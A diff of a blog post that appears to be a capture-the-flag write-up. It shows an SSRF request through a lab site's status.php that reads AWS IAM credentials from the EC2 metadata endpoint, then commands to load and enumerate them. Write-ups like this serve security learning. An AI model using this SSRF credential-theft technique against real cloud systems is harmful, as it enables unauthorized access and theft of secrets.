BrunoCaseiro/brunocaseiro.github.io/_posts/2025-10-04-Testing-pens-in-heaven.md

   <img src="https://github.com/user-attachments/assets/7c4bee36-fbac-4cf5-88c6-a3c9843dab56" />
 </p>

-* Fetch the credentials attached to the EC2 instance with `http://megalogistic.htb/status.php?name=169.254.169.254/latest/meta-data/iam/security-credentials/support`, which reveals the `AccessKeyId`, `SecretAccessKey` and an AWS STS token.
+* Retrieve the credentials attached to the EC2 instance using `http://megalogistic.htb/status.php?name=169.254.169.254/latest/meta-data/iam/security-credentials/support`, which reveals the `AccessKeyId`, `SecretAccessKey` and an AWS STS token.
 <p align="center">
   <img src="https://github.com/user-attachments/assets/c0baf073-60af-44e6-b13c-a4b05f469e3d" />
 </p>

-* Use `aws configure` to use these credentials, which will save them to `~/.aws/credentials`
+* Use `aws configure` to set these credentials, which will save them to `~/.aws/credentials`
 * For the session token, use `aws configure set aws_session_token <token>`
-* Check current identity and privileges, respectively, with `aws sts get-caller-identity` and `aws iam list-attached-user-policies --user-name support`
+* Check your current identity and privileges using `aws sts get-caller-identity` and `aws iam list-attached-user-policies --user-name support`

 <br>